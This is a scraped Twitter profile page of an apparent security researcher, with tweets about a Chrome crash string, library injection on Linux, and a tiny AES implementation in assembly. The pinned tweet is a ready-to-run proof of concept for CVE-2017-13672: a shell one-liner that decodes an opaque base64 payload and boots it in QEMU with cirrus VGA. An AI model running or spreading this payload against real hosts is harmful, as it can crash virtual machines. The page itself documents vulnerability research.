Tweets

You blocked @David3141593

Are you sure you want to view these Tweets? Viewing Tweets won't unblock @David3141593

  1. Pinned Tweet

    CVE-2017-13672: echo H4sICH0mqFkAA3BvYwDbweS/W8LxrMCuK8wbZN85bWh494VhFIwUELoKAIJvFIwAAgAA|base64 -d|gunzip>a&&qemu-system-i386 -vga cirrus a

    Show this thread
    Undo
  2. Jan 23

    And for comparison, here's AES128 in 69 lines of annoyingly terse python: (Taken from a much more readable implementation that I'm working on)

    Undo
  3. Jan 14

    I don't think I've ever been more excited for a Windows update.

    Show this thread
    Undo
  4. Jan 14

    Ah, sounds like it's probably bad cert verification, or related

    Show this thread
    Undo
  5. Jan 14

    What's the crypt32.dll vuln gonna be...

    Show this thread
    Undo
  6. Jan 13

    Apparently fake ThinkPad batteries are a thing now...

    Undo
  7. Jan 5

    I found this entirely by luck. It might be hard to believe, but I was just thinking "I wonder how different renderers will deal with this string". And I picked exactly the right number of characters to hit an off-by-one.

    Show this thread
    Undo
  8. Jan 5
    Show this thread
    Undo
  9. Jan 5

    Crash chrome with this one weird string. Text layout engines HATE it!

    Show this thread
    Undo
  10. Jan 3

    Just noticed I spelt "sytax error" wrong, oops

    Show this thread
    Undo
  11. Jan 3

    I invented(?) a slightly silly way to detect modern versions of python.

    Show this thread
    Undo
  12. Dec 31

    My new year's resolution:

    Undo
  13. It seems like one of the biggest barriers to entry for Linux kernel development/hacking is the fact that the internal APIs keep changing.

    Undo
  14. Seems there's a lot of people out celebrating the end of python2 tonight. I even hear fireworks!

    Undo
  15. Next, I'm gonna implement a kernel module that lets me: a) map pages in a remote process b) CreateRemoteThread That way, I can avoid side-effects of SIGSTOP, or any race conditions.

    Show this thread
    Undo
  16. Ever wanted to inject a shared library into an already-running linux process, without using ptrace? Well, now you can...

    Show this thread
    Undo
  17. Show this thread
    Undo
  18. c) Explain the round loop exit condition. d) Make the code smaller :P (I think this is possible, the shuffling stage was kinda optimised for obscurity rather than size)

    Show this thread
    Undo
  19. For anyone saying "uSinG aEs-Ni iS cHeAtInG": a) AESKEYGENASSIST only supports round constants as immediate arguments, so every other implementation I saw unrolls the key expansion loop. b) I tricked a lot of smart CTF players into thinking this was a non-standard AES impl :P

    Show this thread
    Undo
  20. (for the pedantic: yes, this assumes bit 7 of AL is 0)

    Show this thread
    Undo
  21. I implemented AES128 in 69 bytes of x86 assembly. (from challenge 0). Can anyone beat that? :P

    Show this thread
    Undo

Loading seems to be taking a while.

Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.

    You may also like

    ·